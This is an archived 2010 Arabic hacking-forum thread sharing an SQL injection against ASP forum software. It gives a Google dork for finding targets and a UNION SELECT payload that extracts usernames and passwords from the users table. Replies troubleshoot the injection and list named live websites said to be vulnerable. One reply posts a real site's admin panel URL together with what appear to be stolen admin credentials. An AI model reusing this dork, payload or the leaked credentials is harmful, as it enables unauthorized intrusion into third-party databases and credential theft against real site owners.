:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)
-   -   ثغرت سكيول رائعة (http://www.vbspiders.com/vb/t28883.html)

الشبح المرح 05-06-2010 01:01 AM

ثغرت سكيول رائعة
 
السلام عليكم و رحمة الله تعالو و بركاته

الثغرت مصاب بيها منتديات asp


الدورك : inurl:/forums.asp?iFor=


الاستغلال : اضف في اخر الموقع 12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1 1,12+from+users

وsmilies12عليك اليوزرات و الباسووردات

fearf4ctor 05-06-2010 01:15 AM

GooD WoRk

h1kt0s4 05-06-2010 04:51 AM

بطل ياشبح سلمت يمينك ع الثغره والدورك

MOON14 05-06-2010 12:01 PM

مشكور أخي
بس الحقنه ما لعت معي شيئ
شوف وش الخطأ إلي وقعت فيه
وخبرني
http://www.alamoot-co.com/forum/foru..._id,7,8,9,10,1 1,12+from+users

مستر داتا بيز 05-06-2010 07:51 PM

صحيح الحقنه دي فيها اخطاء كتيره المفروض انه يستخدم امر concat()

ولا حتى نفع اي شىء جربت انا الحقنه من جديد ما ظبطت معى ايه العمل يا برنس

الشبح المرح 05-06-2010 08:07 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة مستر داتا بيز (المشاركة 137296)
صحيح الحقنه دي فيها اخطاء كتيره المفروض انه يستخدم امر concat()

ولا حتى نفع اي شىء جربت انا الحقنه من جديد ما ظبطت معى ايه العمل يا برنس


الحقنة صحيحة مية مية smilies17

ياحبيبي الامر داك يستعمل لجمع الاوامر فقط و انا وضعت كل امر في عمود مصاب اتضن ان هذا خطا smilies9

بالنسبة للاخ الذي لم خرج له الارور

اضن ان الموقع مسكر الثغرة

هدا موقع مصاب

http://www.siamrivers.com/home/modul...,12+from+users

و هدا اخر

http://www.cpbmaroc.org/forum/forums...,12+from+users

smilies14smilies14smilies14

marrak 05-08-2010 12:07 AM

السلام عليكم
اليكم مثال لتغرة العزيز الشبح المرح
الموقع
http://www.alamoot-co.com
لوحة التحكم
http://www.alamoot-co.com/panel/
المعلومات
admin:toomala321
رابط الاستغلال
http://www.alamoot-co.com/forum/forums.asp?iFor=14

لكم تحياتي

algerian hacher 05-11-2010 05:10 AM

يعطيك الصحة وليد بلادي


الساعة الآن 04:31 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0